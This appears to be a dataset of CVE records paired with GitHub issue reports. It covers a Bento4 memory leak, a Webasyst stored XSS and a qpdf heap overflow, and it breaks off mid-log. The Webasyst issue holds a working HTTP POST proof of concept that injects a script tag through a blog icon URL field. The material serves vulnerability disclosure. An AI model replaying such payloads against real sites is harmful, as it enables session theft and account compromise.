Memcheck, a memory error detector ==8898== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==8898== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info ==8898== Command: ./mp42aac /home/ubuntu/lab/Bento4/crashes/id_000006,sig_06,src_000004,time_55114263,execs_1191083,op_flip1,pos_1217 out ==8898== ERROR: no audio track found ==8898== ==8898== HEAP SUMMARY: ==8898== in use at exit: 888 bytes in 9 blocks ==8898== total heap usage: 200 allocs, 191 frees, 93,975 bytes allocated ==8898== ==8898== 48 bytes in 1 blocks are indirectly lost in loss record 1 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x192D1E: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 48 bytes in 2 blocks are indirectly lost in loss record 2 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x175298: AP4_List<AP4_Track>::Add(AP4_Track*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x174AED: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 80 bytes in 2 blocks are indirectly lost in loss record 3 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x174AB8: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 176 bytes in 2 blocks are indirectly lost in loss record 4 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x184E1D: AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x174AD2: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 416 (64 direct, 352 indirect) bytes in 1 blocks are definitely lost in loss record 5 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x172FAD: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 472 bytes in 1 blocks are still reachable in loss record 6 of 6 ==8898== at 0x4848899: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x4B2C64D: __fopen_internal (iofopen.c:65) ==8898== by 0x4B2C64D: fopen@@GLIBC_2.2.5 (iofopen.c:86) ==8898== by 0x192B2A: fopen_s(_IO_FILE**, char const*, char const*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x192C58: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== LEAK SUMMARY: ==8898== definitely lost: 64 bytes in 1 blocks ==8898== indirectly lost: 352 bytes in 7 blocks ==8898== possibly lost: 0 bytes in 0 blocks ==8898== still reachable: 472 bytes in 1 blocks ==8898== suppressed: 0 bytes in 0 blocks ==8898== ==8898== For lists of detected and suppressed errors, rerun with: -s ==8898== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ``` ### Analysis https://github.com/axiomatic-systems/Bento4/blob/1529b83f89d52958b811469fc3ac5206639a3d0f/Source/C%2B%2B/Core/Ap4Movie.cpp#L117-L123 On `AP4_Movie::AP4_Movie`, parsing tracks and added into m_Tracks list, but it seems that mp42aac cannot correctly delete when we got an `no audio track found` error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file.
Memory leaks in mp42aac on adding / deleting AP4_Track::AP4_Tracks
https://api.github.com/repos/axiomatic-systems/Bento4/issues/919/comments
1
2024-01-13T21:23:38Z
2024-02-21T22:47:29Z
https://github.com/axiomatic-systems/Bento4/issues/919
2,080,480,764
919
6,000
CVE-2024-27517
2024-02-29T01:44:20.180
Webasyst 2.9.9 has a Cross-Site Scripting (XSS) vulnerability, Attackers can create blogs containing malicious code after gaining blog permissions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/webasyst/webasyst-framework/issues/377" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/webasyst/webasyst-framework/issues/377" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webasyst:webasyst:2.9.9:*:*:*:*:*:*:*", "matchCriteriaId": "89182418-CDDF-40D0-B2FD-683C1AD2CDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/webasyst/webasyst-framework/issues/377
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "webasyst", "webasyst-framework" ]
### **Summary** Webasyst 2.9.9 has a storage XSS vulnerability,Attackers can create blogs containing malicious code after gaining blog permissions, and even administrators only need to open the page of the blog management function (instead of the specified blog) to be triggered! ### **Details** ![image](https://github.com/webasyst/webasyst-framework/assets/66168888/aa3251f5-6e52-41f2-ac31-0e391a9570ad) As you can see, `$icon_uri` is not filtered in blogHelper.class.php and is concatenated directly into the i tag. ![image](https://github.com/webasyst/webasyst-framework/assets/66168888/ebb0e5a7-23b0-4e6f-8909-8c6b5155024d) We can close the previous i label by `"` and `>`. ![image](https://github.com/webasyst/webasyst-framework/assets/66168888/a8e552c5-fbc7-41df-8815-9ae14ef8620a) ### **Proof of Concept (POC)** ``` POST /index.php/webasyst/blog/?action=settings&blog=0&module=blog HTTP/1.1 Host: 192.168.160.147:7788 Content-Length: 281 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.160.147:7788 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ti4lm4h4iknp715h4rss5u7g5s Connection: close _csrf=65d5ccde9cbb81.61575047&new_route_setup=1&route_domain=192.168.160.147:7788&route_enabled=1&settings[color]=b-gray&settings[icon]=blog&settings[icon_url]=http://bbb.com/\"><ScRiPt>alert(9978)</ScRiPt>&settings[name]=test&settings[status]=on&settings[url]=hebing123hacked ``` When testing, remember to change the `_csrf` and `Cookie` Header in the POC to the corresponding values. ### **Impact** Create permissions to create malicious attackers hold blog blog, blog management function will be affected, the administrator will trigger open http://ip:port/index.php/webasyst/blog/ (0-click).
Webasyst 2.9.9 has a storage XSS vulnerability
https://api.github.com/repos/webasyst/webasyst-framework/issues/377/comments
0
2024-02-21T10:56:22Z
2024-03-11T06:15:36Z
https://github.com/webasyst/webasyst-framework/issues/377
2,146,455,734
377
6,001
CVE-2024-24246
2024-02-29T20:15:41.407
Heap Buffer Overflow vulnerability in qpdf 11.9.0 allows attackers to crash the application via the std::__shared_count() function at /bits/shared_ptr_base.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/qpdf/qpdf/issues/1123" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4WLK6ICPJUMOJNHZQWXAA5MPXG5JHZZL/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FX3D3YCNS6CQL3774OFUROLP3EM25ILC/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3N6TULMEYVCLXO47Y5W4VWCJMSB72CB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/qpdf/qpdf/issues/1123" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4WLK6ICPJUMOJNHZQWXAA5MPXG5JHZZL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FX3D3YCNS6CQL3774OFUROLP3EM25ILC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3N6TULMEYVCLXO47Y5W4VWCJMSB72CB/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:qpdf_project:qpdf:11.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "E8567C78-2FB2-4365-9A94-F2E2B896AAB7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*", "matchCriteriaId": "CA277A6C-83EC-4536-9125-97B84C4FAF59", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/qpdf/qpdf/issues/1123
[ "Exploit", "Vendor Advisory" ]
github.com
[ "qpdf", "qpdf" ]
### Description I found a heap-buffer-overflow crash when I use this instruction: ```shell /qpdf/build/qpdf/qpdf --json-input POC_qpdf11-9-0_heap-buffer-overflow output_json.pdf #Changed the name of id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 to POC_qpdf11-9-0_heap-buffer-overflow ``` ### Version ```shell chen@DESKTOP-9AK26R1:~/qpdf2/crashes$ /home/chen/qpdf2/qpdf/build/qpdf/qpdf --version qpdf version 11.9.0 Run qpdf --copyright to see copyright and license information. ``` ### Reference https://github.com/qpdf/qpdf ### **Actual Behavior** heap-buffer-overflow ### PoC https://github.com/Crspidey/my-poc/blob/main/POC_qpdf11-9-0_heap-buffer-overflow ### Reproduction ```shell git clone https://github.com/qpdf/qpdf cd qpdf ./build-scripts/build-linux #Modified the instruction to add ASAN. #cmake -S . -B build -DCI_MODE=1 -DCMAKE_BUILD_TYPE=RelWithDebInfo \ # -DREQUIRE_CRYPTO_OPENSSL=1 -DREQUIRE_CRYPTO_GNUTLS=1 \ # -DCMAKE_C_FLAGS="${CMAKE_C_FLAGS} -fsanitize=address" \ # -DCMAKE_CXX_FLAGS="${CMAKE_CXX_FLAGS} -fsanitize=address" \ ``` ### ASAN Log ```shell chen@DESKTOP-9AK26R1:~/qpdf2/crashes$ /home/chen/qpdf2/qpdf/build/qpdf/qpdf --json-input id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 output_json.pdf WARNING: id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 (obj:3 0 R, offset 738): "stream.data" must be a string ================================================================= ==3736095==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000d2d8 at pc 0x7f929f1e4327 bp 0x7ffc280f2ac0 sp 0x7ffc280f2ab0 READ of size 8 at 0x60600000d2d8 thread T0 #0 0x7f929f1e4326 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count() /usr/include/c++/11/bits/shared_ptr_base.h:704 #1 0x7f929f1e4326 in std::__shared_ptr<QPDFObject, (__gnu_cxx::_Lock_policy)2>::~__shared_ptr() /usr/include/c++/11/bits/shared_ptr_base.h:1154 #2 0x7f929f1e4326 in std::shared_ptr<QPDFObject>::~shared_ptr() /usr/include/c++/11/bits/shared_ptr.h:122 #3 0x7f929f1e4326 in QPDFObjectHandle::~QPDFObjectHandle() /home/chen/qpdf2/qpdf/include/qpdf/QPDFObjectHandle.hh:64 #4 0x7f929f1e4326 in void __gnu_cxx::new_allocator<QPDFObjectHandle>::destroy<QPDFObjectHandle>(QPDFObjectHandle*) /usr/include/c++/11/ext/new_allocator.h:168 #5 0x7f929f1e4326 in void std::allocator_traits<std::allocator<QPDFObjectHandle> >::destroy<QPDFObjectHandle>(std::allocator<QPDFObjectHandle>&, QPDFObjectHandle*) /usr/include/c++/11/bits/alloc_traits.h:535 #6 0x7f929f1e4326 in std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::pop_back() /usr/include/c++/11/bits/stl_vector.h:1229 #7 0x7f929f1e4326 in QPDF::JSONReactor::containerEnd(JSON const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:419 #8 0x7f929ec79cf2 in handleToken /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1188 #9 0x7f929ec7c96f in parse /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1335 #10 0x7f929ec7d1c6 in JSON::parse(InputSource&, JSON::Reactor*) /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1352 #11 0x7f929f1f5e32 in QPDF::importJSON(std::shared_ptr<InputSource>, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:806 #12 0x7f929f1f6d34 in QPDF::createFromJSON(std::shared_ptr<InputSource>) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:786 #13 0x7f929f1fb3e3 in QPDF::createFromJSON(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:779 #14 0x7f929ee8deba in QPDFJob::doProcessOnce(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1725 #15 0x7f929ee8e73e in QPDFJob::doProcess(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1763 #16 0x7f929ee90383 in QPDFJob::processFile(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, char const*, char const*, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1819 #17 0x7f929eefbcb3 in QPDFJob::createQPDF() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:434 #18 0x7f929ef081d9 in QPDFJob::run() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:516 #19 0x55dff954ba51 in realmain(int, char**) /home/chen/qpdf2/qpdf/qpdf/qpdf.cc:36 #20 0x7f929e5cdd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #21 0x7f929e5cde3f in __libc_start_main_impl ../csu/libc-start.c:392 #22 0x55dff954b884 in _start (/home/chen/qpdf2/qpdf/build/qpdf/qpdf+0x2884) 0x60600000d2d8 is located 8 bytes to the left of 64-byte region [0x60600000d2e0,0x60600000d320) allocated by thread T0 here: #0 0x7f929f5c91e7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99 #1 0x7f929ed5361a in __gnu_cxx::new_allocator<QPDFObjectHandle>::allocate(unsigned long, void const*) /usr/include/c++/11/ext/new_allocator.h:127 #2 0x7f929ed5361a in std::allocator_traits<std::allocator<QPDFObjectHandle> >::allocate(std::allocator<QPDFObjectHandle>&, unsigned long) /usr/include/c++/11/bits/alloc_traits.h:464 #3 0x7f929ed5361a in std::_Vector_base<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_allocate(unsigned long) /usr/include/c++/11/bits/stl_vector.h:346 #4 0x7f929ed5361a in void std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_realloc_insert<QPDFObjectHandle const&>(__gnu_cxx::__normal_iterator<QPDFObjectHandle*, std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> > >, QPDFObjectHandle const&) /usr/include/c++/11/bits/vector.tcc:440 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/c++/11/bits/shared_ptr_base.h:704 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count() Shadow bytes around the buggy address: 0x0c0c7fff9a00: 00 00 02 fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9a10: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff9a20: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00 0x0c0c7fff9a30: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9a40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa =>0x0c0c7fff9a50: fd fd fd fd fd fd fd fd fa fa fa[fa]00 00 00 00 0x0c0c7fff9a60: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9a70: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9a80: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 0x0c0c7fff9a90: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3736095==ABORTING ``` ### GDB log ```shell (gdb) set args --json-input id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 output_json.pdf (gdb) run Starting program: /home/chen/qpdf2/qpdf/build/qpdf/qpdf --json-input id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 output_json.pdf [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". WARNING: id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 (obj:3 0 R, offset 738): "stream.data" must be a string ================================================================= ==3736122==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000d2d8 at pc 0x7ffff7297327 bp 0x7fffffff7740 sp 0x7fffffff7730 READ of size 8 at 0x60600000d2d8 thread T0 #0 0x7ffff7297326 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count() /usr/include/c++/11/bits/shared_ptr_base.h:704 #1 0x7ffff7297326 in std::__shared_ptr<QPDFObject, (__gnu_cxx::_Lock_policy)2>::~__shared_ptr() /usr/include/c++/11/bits/shared_ptr_base.h:1154 #2 0x7ffff7297326 in std::shared_ptr<QPDFObject>::~shared_ptr() /usr/include/c++/11/bits/shared_ptr.h:122 #3 0x7ffff7297326 in QPDFObjectHandle::~QPDFObjectHandle() /home/chen/qpdf2/qpdf/include/qpdf/QPDFObjectHandle.hh:64 #4 0x7ffff7297326 in void __gnu_cxx::new_allocator<QPDFObjectHandle>::destroy<QPDFObjectHandle>(QPDFObjectHandle*) /usr/include/c++/11/ext/new_allocator.h:168 #5 0x7ffff7297326 in void std::allocator_traits<std::allocator<QPDFObjectHandle> >::destroy<QPDFObjectHandle>(std::allocator<QPDFObjectHandle>&, QPDFObjectHandle*) /usr/include/c++/11/bits/alloc_traits.h:535 #6 0x7ffff7297326 in std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::pop_back() /usr/include/c++/11/bits/stl_vector.h:1229 #7 0x7ffff7297326 in QPDF::JSONReactor::containerEnd(JSON const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:419 #8 0x7ffff6d2ccf2 in handleToken /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1188 #9 0x7ffff6d2f96f in parse /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1335 #10 0x7ffff6d301c6 in JSON::parse(InputSource&, JSON::Reactor*) /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1352 #11 0x7ffff72a8e32 in QPDF::importJSON(std::shared_ptr<InputSource>, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:806 #12 0x7ffff72a9d34 in QPDF::createFromJSON(std::shared_ptr<InputSource>) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:786 #13 0x7ffff72ae3e3 in QPDF::createFromJSON(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:779 #14 0x7ffff6f40eba in QPDFJob::doProcessOnce(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1725 #15 0x7ffff6f4173e in QPDFJob::doProcess(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1763 #16 0x7ffff6f43383 in QPDFJob::processFile(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, char const*, char const*, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1819 #17 0x7ffff6faecb3 in QPDFJob::createQPDF() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:434 #18 0x7ffff6fbb1d9 in QPDFJob::run() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:516 #19 0x555555556a51 in realmain(int, char**) /home/chen/qpdf2/qpdf/qpdf/qpdf.cc:36 #20 0x7ffff6680d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #21 0x7ffff6680e3f in __libc_start_main_impl ../csu/libc-start.c:392 #22 0x555555556884 in _start (/home/chen/qpdf2/qpdf/build/qpdf/qpdf+0x2884) 0x60600000d2d8 is located 8 bytes to the left of 64-byte region [0x60600000d2e0,0x60600000d320) allocated by thread T0 here: #0 0x7ffff767c1e7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99 #1 0x7ffff6e0661a in __gnu_cxx::new_allocator<QPDFObjectHandle>::allocate(unsigned long, void const*) /usr/include/c++/11/ext/new_allocator.h:127 #2 0x7ffff6e0661a in std::allocator_traits<std::allocator<QPDFObjectHandle> >::allocate(std::allocator<QPDFObjectHandle>&, unsigned long) /usr/include/c++/11/bits/alloc_traits.h:464 #3 0x7ffff6e0661a in std::_Vector_base<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_allocate(unsigned long) /usr/include/c++/11/bits/stl_vector.h:346 #4 0x7ffff6e0661a in void std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_realloc_insert<QPDFObjectHandle const&>(__gnu_cxx::__normal_iterator<QPDFObjectHandle*, std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> > >, QPDFObjectHandle const&) /usr/include/c++/11/bits/vector.tcc:440 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/c++/11/bits/shared_ptr_base.h:704 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count() Shadow bytes around the buggy address: 0x0c0c7fff9a00: 00 00 02 fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9a10: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff9a20: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00 0x0c0c7fff9a30: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff9a40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa =>0x0c0c7fff9a50: fd fd fd fd fd fd fd fd fa 